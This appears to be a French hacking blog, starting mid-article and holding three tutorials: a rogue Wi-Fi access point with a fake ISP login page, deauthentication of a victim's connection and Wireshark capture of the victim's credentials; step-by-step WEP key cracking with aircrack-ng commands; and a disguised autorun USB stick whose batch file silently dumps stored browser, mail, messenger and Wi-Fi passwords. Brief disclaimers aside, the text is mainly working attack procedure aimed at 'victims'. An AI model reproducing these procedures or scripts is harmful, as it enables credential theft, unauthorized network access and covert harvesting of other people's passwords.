-On télécharge ensuite Le Package "Tout-en-un", en l'enregistrant sur le "bureau" de BACKTRACK (cf : /root/Desktop/)

 

-Une fois celui-ci arrivé (ça devrait pas être trop long xD), ouvrez une Konsole, et tapez-y : cd /root/Desktop/ (vous devriez avoir quelque chose comme root@bt:~/Desktop). Tapez ensuite : tar xf /root/Desktop/RogueAPHash.tar ce qui aura pour effet d'extraire notre archive dans un dossier RogueAPHash sur le bureau.

Vous trouverez à l'intérieur de ce dossier, 4 fichiers de configuration, le script RogueApache, et enfin la fausse page de login dans le dossier "NeufRogue".

 

Faites comme ceci :

 

-Copiez le fichier apache2.conf dans le dossier /etc/apache2/, remplacez le fichier existant (overwrite)

-Copiez le fichier httpd.conf dans le dossier /etc/apache2/, remplacez le fichier existant (overwrite)

-Copiez le fichier dhcpd.conf dans le dossier /etc/dhcp3/, remplacez le fichier existant (overwrite)

-Copiez le fichier dns.txt sur le bureau (chemin : /root/Desktop/)

-Copiez le contenu du dossier "NeufRogue" dans le dossier "/var/www/" en ayant pris soin de virer le fichier index.html déjà présent (mettez le où vous voulez mais pas dans ce dossier là quoi xD !)

-Laissez le fichier RogueApache.sh la où il est. 

 

---------------------------------------------------------------------------------------------------------------------------------------------------------------------

A ce moment là, tout est prêt. Vous pouvez mettre les pages que vous voulez dans /var/www/ (allez faire un tour sur le forum crack-WiFi et récupérez-y les pages d'interface des Boxs).

---------------------------------------------------------------------------------------------------------------------------------------------------------------------

 

Voila, vous n'avez plus qu'à ouvrir une Konsole, et tapez-y : /root/Desktop/RogueAPHash/RogueApache

 

VOICI A QUOI CA VA RESSEMBLER :capture d'écran3

 

 

Le script lancé, il va vous poser quelques questions :

 

Interface Rogue : choisissez votre Interface WiFi (exemple : wlan0)     (1)

Nom de la Rogue_AP : choisissez le nom de votre Rogue (exemple : WiFi-Test)  (3)

Channel de la Rogue_AP : choisissez le channel de votre Rogue (exemple : 4)  (4)

 

Le script fait son petit bonhomme de chemin.

Il active :

-le mode monitor sur votre interface WiFi (2)

-le serveur WEB apache (5)

-le dhcp pour fournir une ip au client victime (6) (crée une petite konsole)

-le dnsspoof qui redirige les pages demandées par le client victime vers notre fake page (7) (crée une petite konsole)

-le airbase-ng qui crée notre rogue AP (interface fictive at0) (8) (crée une petite konsole)

 

 

--------------------------------------------------------------------------------------------------------------------------------------------------------------------- 

 

Pour récupérer les Identifiants du client victime, VOUS DEVREZ CONFIGURER ET LANCER WIRESHARK AUSSITOT APRES LA CREATION DU ROGUE !!!!!

 

Menu KDE->Privilege Escalation->Protocol Analysis->Network Sniffers->Wireshark lancement wireshark

 

-Une fois ceci fait, choisissez l'interface de notre rogueAP soit "at0" :choixinterfacewireshark.PNG

 

Et vous n'avez plus qu'à attendre qu'un client victime se connecte.

La fake page de login est desservie, le client victime s'y connecte, rentre ses "Infos", ça défile tout partout dans Wireshark, mais qu'est-ce que donc t'il tout ce bordel ??

 

-Nous allons maintenant rechercher dans la capture Wireshark ce qui nous intéresse :wireshark capture

 

-Stoppez la capture quand vous jugerez bon de le faire (chercher des infos dans Wireshark alors qu'il sniffe encore, c'est pas commode, ça devient vite le foutoir)

-Tapez http dans le champ "Filter" (vous affiche les packets http uniquement) (1)

-Cherchez ensuite dans la colonne "info" un packet qui comporte le mot "POST" (2) (Données envoyées)

-Dans ce packet, déroulez le menu "Hypertext Transfert Protocol" (3)

-Déroulez ensuite la ligne "Line-based text data" (4)

-Récupérez les login/mots de passe (5)

 

--------------------------------------------------------------------------------------------------------------------------------------------------------------------- 

 

ASTUCES : Déploiement de l'attaque

 

- Lancez le script "RogueApache"

 

- Lancez Wireshark en capture sur "at0"

 

- Le nom de votre Rogue ainsi que son adresse MAC et son channel doivent être identiques à la BOX victime pour que client déconnecté arrive sur votre Rogue. (Un petit coup de airodump-ng va vous aider pour ses infos).

 

- Voila, vous n'avez plus qu'a "interrompre les communications de la Box victime en utilisant MDK3 conjointement avec l'attaque airbase-ng -0 (Deauth MODE), ciblée précisement sur la Box victime et son client connecté"

 

- Priez un coup

 

- Et HOP ! Vous voila avec votre client kidnappé de sa box et se connectant à votre Rogue !

 

- Vous restez sur Wireshark, et capturez les identifiants et mots de passe rentrés par le client victime.

 

--------------------------------------------------------------------------------------------------------------------------------------------------------------------- 

PROBLEMES COURANTS PENDANT LES TESTS:

 

-Lorsque le script sera activé, ouvrez votre navigateur et tapez-y : "http://localhost" ou "http://127.0.0.1", ce qui aura pour effet de vous montrer la page Internet que les clients de votre Rogue verront lorsqu'il voudront joindre un site internet. La page affichée est en fait le contenu du dossier /var/www/. Si vous n'avez pas encore mis votre page php ou html dans ce dossier, vous devriez voir une page où il est écrit "IT WORKS". Si vous ne voyez pas votre page s'afficher dans le navigateur, c'est que le paramètrage d'Apache n'est pas bon.

 

-N'hésitez pas à ouvrir le script dans votre éditeur de texte pour voir les entrailles de celui-ci, son fonctionnement ...(Au niveau du airmon-ng des cartes WiFi, j'ai configuré le  script pour  qu'il unload mon driver "rtl8187", qu'il me load mon driver "r8187" et qu'il active le monitoring sur ma "wlan0" avec driver "r8187", ce qui fait que l'interface monitor sera "wlan0" et non pas "mon0") BAH OUI TOUT LE MONDE SAIT CA !!! XD (La awus036h à 2 drivers fonctionnels [déchargement du driver puis chargement soit rmmod rtl8187 && modprobe r8187 ou inversement, à noter que le r8187 permet le iwconfig wlan0 mode master]).

 

-Si vous changez la page desservie par Apache mais que le navigateur victime affiche l'ancienne page (vous venez par exemple de virer la page de test index.html (IT WORKS!) et copié une page de login Numéricable, vous devrez redémarrer le script (serveur apache) et aussi supprimer l'historique dans le Firefox du client victime. Testez plusieurs fois, histoire d'avoir un truc propre qui fonctionne du 1er coup ^^.

 

---------------------------------------------------------------------------------------------------------------------------------------------------------------------

 


Voila un deuxième tuto d'achevé. J'espère qu'il vous a plu et si vous avez des questions techniques, n'hésitez pas à me les poser dans les commentaires, j'y répondrai avec plaisir^^.

Je vous rappelle quand même, pour info, que nous ne vous encourageons en aucun cas à effectuer ces attaques sur des réseaux dont vous n'êtes pas les propriétaires. La confiance que vous avez dans vos HotSpots favoris ou habituels est désormais ébranlée et les faiblesses de ces plateformes démontrées. Ce "HOWTO" a été rédigé dans un but "pédagogeek", "instructif", "démonstratif à caractère ambivalencienne" et/ou "de dominer le monde sous-marin" (rayez les mentions inutiles) XD.
Allez si vous n'avez pas rayé "de dominer le monde sous-marin", on vous pardonne et vous recevrez un magnifique t-shirt "I LOVE DOLPHINS" en prime XD !!

i_love_dolphins_tshirt-p235816495798896867trlf_400.jpg

        BOOSTEZ VOTRE SEX-APPEAL MAINTENANT !!

 

C'EST LA CLASSE CA NAN ????

Allez, à bientôt pour un nouveau tutoriel dementiel !

 

     #//Roll a spliff and get high, every day an every night//#

 

                       Rédacteur : M@JesTiK

Partager cet article
Repost0
17 juin 2011 5 17 /06 /juin /2011 19:59

Bonjour à tous, je suis "M@JesTik" le nouveau rédacteur de ce blog. J'accompagnerai Lakai0rfake dans la rédaction d'articles traitant des nouvelles technologies et autres sournoiseries informatiques.

 

Mon premier article abordera la sécurité réseau : Comment casser une Clé WEP grâce à la distribution Linux "Backtrack".

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

VOICI NOTRE OBJECTIF :  - Obtenir la Clé de sécurité WEP d'une borne WiFi (Point D'accès)

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

VOICI NOS PREREQUIS :  

 

- BACKTRACK  5 (disponible en téléchargement ici -> http://www.backtrack-linux.org/downloads/)

 

- Clé USB WIFI ou Carte WiFi intégrée. (Avant d'en acheter une, vérifiez la compatibilité sur le site aircrack-ng)

Je vous conseille la AWUS036h (chipset RTL8187L)

 

- Un PC pas trop moisi (quoiqu'un netbook, ou un Pentium3 fasse amplement l'affaire).

 

- Vos petites mimines, votre tête et ce tuto.

 

- Linux Live USB Creator (qui permet de lancer Backtrack depuis une clé USB)-> http://www.linuxliveusb.com/en/download

- Clé USB 2Go ou plus

 

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

ALLONS NOUS FAIRE UN BON CAFE ET C'EST PARTI !

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

-Commençons par télécharger Backtrack 5 en suivant le lien ci-dessus.

-Cliquez ensuite sur DOWNLOAD

-Choisissez ensuite votre type de bureau (GNOME ou KDE, je conseille KDE, puis l'architecture 32 ou 64bits (si vous ne savez pas, prenez 32bits), selectionnez ISO, choisissez Direct Download, puis Click to Download, attendez 10 secondes, enregistez l'ISO sur votre bureau et patientez le temps que ça arrive.

-Téléchargez ensuite Linux Live USB Creator, installez le et lancez le.

-Aidez vous de cette capture d'écran pour (1)selectionner votre clé USB (2)selectionner votre ISO backtrack (3)laisser tel quel (persistance 0Mo(mode live)) (4)cocher Formater la Clé en FAT32 et (5) lancer l'installation.

tuto linux live usb creator

Une fois ceci fini, votre clé USB Backtrack 5 Live est ready ! ^^

---------------------------------------------------------------------------------------------------------------------------------------------------------------------

- Redémarrez, entrez dans votre BIOS, choisissez votre clé USB comme premier périphérique d'amorçage, quittez en sauvegardant(F10) et let's go kids !!

---------------------------------------------------------------------------------------------------------------------------------------------------------------------

Vous voila dans le GRUBLoader (comprenez lanceur de Systèmes Linux)

- Choisissez le premier (Backtrack Text - Default Boot Text Mode) en validant avec "Entrée".

- Patientez le temps que le système se charge, et, lorsque "root@root" s'affiche tapez stqrtx (comprenez startx en clavier US)

backboot.JPG

- Vous voila sous Backtrack 5 (étant en mode Live, vos fichiers copiés et vos paramètres ne seront pas sauvegardés)

- (il vous affichera peut-être une fenêtre nommée "Removed Sound Devices", cliquez sur "NO")

-Cliquez sur Install Backtrack, selectionnez "Français", faites suivant, encore suivant (ce qui mettra votre clavier en azerty) et quittez l'installateur.

- Cherchez ensuite le "menu démarrer", c'est un dragon en bas à gauche, et allez dans System>Konsole(Terminal)

kde-online.JPG

- Nous y voila enfin...

- Ouvrez 3 onglets supplémentaires  (fonctionnent comme des onglets Firefox) (ou 3 konsoles, comme vous voulez) en double cliquant dans la barre noire en bas de la Konsole,  ICI -> :

 

konsole.JPG

 

 

Maintenant, CONCENTRONS-NOUS sur l'attaque à proprement parler...

---------------------------------------------------------------------------------------------------------------------------------------------------------------------

(UN POINT TRES IMPORTANT, LES MINUSCULES ET MAJUSCULES SONT A RESPECTER A LA LETTRE SOUS PEINE QUE LE PROGRAMME EN QUESTION VOUS AFFICHE LA LISTE COMPLETE DE COMMANDES (juste pour vous dire que vous vous êtes planté XD))

---------------------------------------------------------------------------------------------------------------------------------------------------------------------

A partir de maintenant, les commandes à entrer seront surlignées en orange.

 

Voici les commandes que nous allons utiliser ainsi que des explications les concernants.

 

airmon-ng : lister les interfaces WiFi de votre PC (Clé USB, carte WiFi intégrée).

macchanger : sert à changer son adresse MAC par une autre.

airodump-ng : sert à cibler un réseau en particulier et à enregistrer les données qui y transitent.

aireplay-ng : sert à injecter des packets

aircrack-ng : utilise le fichier de capture de airodump-ng afin de cracker la clé WEP

---------------------------------------------------------------------------------------------------------------------------------------------------------------------

PREMIERE ETAPE : Mettre notre interface WiFi en mode monitor (écoute, envoi de packets)

 

- Tapez airmon-ng dans la première konsole afin de lister les interfaces wifi de votre pc, il vous affichera par exemple wlan0 ou wlan1(par exemple pour un pc portable, wlan0 sera la carte wifi intégrée et wlan1, la clé USB WiFi)

 

- Nous allons donc mettre notre interface WiFi en mode monitor grâce à la commande airmon-ng start wlan0 ou airmon-ng start wlan1 selon l'interface que vous avez choisi.

- airmon-ng va donc créer une interface "virtuelle" de notre clé WiFi, qui s'appelle "mon0" (mon zéro), c'est cette interface que nous utiliseront dès maintenant et ce, jusqu'a la fin de notre tuto.

 

Nous allons maintenant changer notre adresse MAC (adresse physique de l'interface WiFi ou Ethernet servant à identifier le matériel (n° constructeur, etc...))

Pour cela, nous allons taper macchanger -r mon0.

---------------------------------------------------------------------------------------------------------------------------------------------------------------------

DEUXIEME ETAPE : Cibler le point d'accès WEP et le mettre sous surveillance.

 

- Tapez dans notre Konsole la commande : airodump-ng mon0 --encrypt wep

Le "--encrypt wep" sert à ne selectionner que les points d'accès chiffrés en WEP. Pratique non ?

 

 

- Voila à quoi ressemble "airodump-ng" :

capture-d-ecran1-copie-1.png

- Prenez note de l'adresse MAC et du canal du point d'accès cible.

 

- Faites maintenant un CTRL+C, afin de stopper notre programme.

 

OK, maintenant, nous allons affiner notre surveillance, en y ajoutant le canal (-c), l'adresse MAC (--bssid), et nous allons lui dire de nous enregistrer tout ça dans un fichier qui nous permettra de cracker la clé.

 

Pour l'exemple, j'utilise l'adresse MAC 00:11:22:33:44:55 et le canal 6

 

- Tapez airodump-ng mon0 --encrypt wep --bssid 00:11:22:33:44:55 -c 6 -w /root/Desktop/crackwep01

La commande "-w /root/Desktop/crackwep01" demande au programme d'écrire (-w = write) toutes les données concernant notre point d'accès ciblé dans le fichier crackwep01, qui se situera sur le bureau (/root/Desktop/)

Très important aussi : LAISSEZ TOURNER AIRODUMP-NG JUSQU'A LA FIN DE L'ATTAQUE

(Car c'est grâce à sa collecte de packets que le fichier crackwep01 sera rempli de données utilisables)

 

Voila maintenant tout est près pour ....

---------------------------------------------------------------------------------------------------------------------------------------------------------------------

LA TROISIEME ETAPE : Générer des DATAS (en ayant une station connectée)

 

Regardez la capture d'écran juste au dessus, vous y voyez une colonne nommée DATAS ?

Regardez aussi dans le bas de l'image, on y voit BSSID (un point d'accès), et STATION (client connecté au point d'accès)

 

Les DATAS, sont en fait ce qu'on appelle les IVS (Initialization Vectors) qui contiennent la clé WEP. Plus il y en a, plus on aura de chances de cracker la clé.

 

Si elles montent rapidement sans que vous ne fassiez quoique ce soit, et ça arrive lorsque quelqu'un télécharge ou regarde la TV par ADSL, vous êtes un(e) veinard(e).

 

Maintenant, imaginons que nous surveillons notre point d'accès "00:11:22:33:44:55", auquel est connecté un client (pc portable en WiFi par exemple) avec une adresse MAC 22:22:33:33:11:11, nous allons pouvoir utiliser le client connecté (22:22:33:33:11:11)afin de faire générer des DATAS (IVS).

 

- Ouvrez une nouvelle Konsole (ou un onglet précedemment crée en laissant airodump-ng tourner)

- Tapez aireplay-ng -3 -b 00:11:22:33:44:55 -h 22:22:33:33:11:11 mon0 et tapez sur Entrée.

Le -3, est le type d'attaque, soit un ARP Request (génération d'IVS, en gros)

Le -b désigne l'adresse MAC du point d'accès ciblé.

Le -h désigne l'adresse MAC du client connecté au point d'accès.

mon0 désigne l'interface monitor.

 

Voila, vous devez normalement répérer les mots ACK et ARP précédés par des nombres.

Lorsque les nombres de ARP commencent à grimper, retournez sur airodump-ng, et la... MIRACLE, les IVS montent en flèche.

Dès que vous avez 5000 DATAS, vous pouvez ouvrir une nouvelle Konsole, TOUJOURS EN LAISSANT LES 2 AUTRES TOURNER.

C'est dans cette nouvelle Konsole que va se dérouler....

---------------------------------------------------------------------------------------------------------------------------------------------------------------------

LA QUATRIEME ETAPE : Le Crack de la clé WEP

 

Dans cette nouvelle Konsole, tapez aircrack-ng /root/Desktop/*.cap, comprenez aircrack-ng doit chercher dans /root/Desktop/ (votre bureau), tous les fichiers .cap sans se soucier du nom (*).

Et voila, vous n'avez plus qu'a patienter. Si il s'arrete pour vous dire qu'il n'a pas asez d'IVS, ne vous inquiétez pas, il se relancera automatiquement dès lors qu'il aura 5000 IVS (DATAS) supplémentaires.

 

Et au bout d'un moment (10-15 minutes), KEY FOUND !!

 

Le résultat affiché entre les crochets est la clé WEP tant convoitée.

 

Retirez les 2 points entre chaque paire, et rentrez la clé dans votre gestionnaire de réseaux WiFi.

 

Ex :           KEY FOUND !  [00:AA:BB:CC:DD:EE:FF:GG]

 

Vous allez donc rentrer 00AABBCCDDEEFFGG ou encore 00aabbccddeeffgg (oui la clé wep s'enfout des majuscules, elle !)

 

Si aircrack-ng vous dit KEY FOUND ! et vous affiche aussi un résultat ASCII, (comprenez clé WEP d'origine changée par un mot intélligible) rentrez la en ASCII dans votre gestionnaire WiFi.

 

Je tiens à préciser que ce tutoriel a été réalisé dans le but de démontrer les faiblesses du cryptage WEP, ainsi que la rapidité et la simplicité avec laquelle ce cryptage peut être contourné. Nous n'encourageons pas ce genre de pratiques. Toutes les manipulations décrites ci-dessus doivent être exécutées sur vos installations personnelles ou sur un réseau dont vous avez la permission du propriétaire. Si vous tentez ces attaques sur le réseau d'un tiers, vous risquez la prison pour intrusion dans un système informatisé, violation de vie privée, etc ...

Ceci est juste à but educatif et/ou préventif. Vous êtes maintenant prévenu, passez au WPA2 !

 

Je vous remerci d'avoir lu mon premier article écrit sur ce blog qui aspire à devenir grand. Mon prochain sujet abordé sera celui du Rogue AP et de la récupération d'une clé WPA. Je vous invite à poser vos questions dans les commentaires de cet article, j'y répondrais avec joie ^^

 

"#!! Roll a spliff and get high, every day and every night !!#"

 

                             Redacteur : M@JesTiK

 

Partager cet article
Repost0
10 mai 2011 2 10 /05 /mai /2011 19:59

         Bonjour à tous et désolé pour le manque d'activité . Ce problème est résolu car nous sommes désormais 2 rédacteurs . Aujourd'hui nous allons voir comment créer une clef usb rootkit qui va récupérer tous les mots de passe, login ou même identifiants réseaux, clef wep ... stocker dans votre pc et le copier en .txt sur votre clef usb . Le tout sans rien avoir à faire et de manière invisible !!! Formidable et vraiment très très utile surtout quand on a perdu ses mots de passe .

 

         Dans un premier temps, nous allons récupérer plusieurs logiciels qui nous permettent de déchiffrer les mots de passe des applications les plus courantes. Toutes ces applications sont issues du site Nirsoft (http://www.nirsoft.net/).

 

         >  ChromePass : ChromePass est un outil qui vous permet de retrouver les noms d’utilisateur et mots de passe stockés par le navigateur Web Google Chrome. Pour chaque mot de passe, l’information suivante est affichée: URL Origine, URL action, le nom d’utilisateur, mot de passe et l’heure de création.

             Lien de téléchargement : http://www.nirsoft.net/utils/chromepass.html

 

        >  IE PassView: IE PassView est un petit utilitaire qui révèle les mots de passe stockés par le navigateur Internet Explorer. Compatible avec le nouveau Internet Explorer 8.0, ainsi que les anciennes versions d’Internet Explorer v4.0 v6.0 v7.0.

           Lien de téléchargement : http://www.nirsoft.net/utils/internet_explorer_password.html

 

        >  Mail PassView: récupère les mots de passe des programmes de messagerie suivants: Outlook Express, Microsoft Outlook 2000 (comptes POP3 et SMTP uniquement), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP et SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free, hotmail, yahoo, msn, gmail.

           Lien de téléchargement : http://www.nirsoft.net/utils/mailpv.html

 

        >  MessenPass: récupère les mots de passe de messagerie instantanée le plus populaire des programmes: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger avec Netscape ...

           Lien de téléchargement : http://www.nirsoft.net/utils/mspass.html

 

        >  Network Password Recovery : Lorsque vous vous connectez à un partage réseau sur votre réseau local ou sur votre compte. NET Passport, Windows vous permet d’enregistrer votre mot de passe afin de l’utiliser à chaque fois que vous vous connectez sur le serveur distant. Cet utilitaire récupère tous les mots de passe réseau stockés sur votre système pour l’utilisateur connecté.

            Lien de téléchargement : http://www.nirsoft.net/utils/network_password_recovery.html

 

        >  PasswordFox: PasswordFox est un petit outil qui vous permet d’afficher les noms d’utilisateur et mots de passe stockés par le navigateur Web Mozilla Firefox.

            Lien de téléchargement : http://www.nirsoft.net/utils/passwordfox.html

 

       >  Protected Storage PassView: Récupère tous les mots de passe stockés dans le Protected Storage, y compris la saisie semi-automatique des mots de passe d’Internet Explorer, les mots de passe des sites protégés par mot de passe, mot de passe de MSN Explorer ...

           Lien de téléchargement : http://www.nirsoft.net/utils/pspv.html

 

       >  WirelessKeyView  : WirelessKeyView récupère toutes les clés des réseaux sans fil / mots de passe (WEP / WPA) stockés dans votre ordinateur .

          Lien de téléchargement : http://www.nirsoft.net/utils/wireless_key.html

 

              ATTENTION CERTAINS SOFT SONT DETECTES PAR LES ANTI VIRUS !!! A VOUS DE TESTER ...

 

       Maintenant que nous avons tous les outils nécessaires, nous allons pouvoir commencer à créer la clef .

 

  1 -     Commencez par récupérer tous les .exe que nous venons de télécharger et placez les à la racine de votre clef usb .

  2 -     Ouvrez le bloc note et copiez le texte suivant :

 

                                 [autorun]
                      open = launch.bat
                      ACTION = Scan Passwords

 

            Puis enregistrez le fichier sous la racine de la clé sous le nom autorun.inf


            Vous pouvez changer "Scan Password" par "Ouvrir les Fichiers" pour que cela paresse plus anodin. Rajoutez juste une ligne de commande dans le .bat que nous allons voir après pour ouvrir l'explorer ...


  3 -     Ouvrez le bloc note et copiez le texte suivant :

 

                                @echo off

                                 start ChromePass.exe /stext ChromePass.txt
                      start iepv.exe /stext iepv.txt
                      start mailpv.exe /stext mailpv.txt
                      start mspass.exe /stext mspass.txt
                      start netpass.exe /stext netpass.txt
                      start PasswordFox.exe /stext PasswordFox.txt
                      start pspv.exe /stext pspv.txt
                      start WirelessKeyView.exe /stext WirelessKeyView.txt

 

            Ensuite enregistrez votre document à la racine de votre clé, sous le nom de launch.bat

 

            Votre rootkit est maintenant près, il ne reste plus qu'à le tester . Vous trouverez tous les mot de passe au format texte à la racine de votre clef usb .

 

ENJOY ...

 

Rédacteur : Lakai0rFake

 

 

 

 

 

Partager cet article
Repost0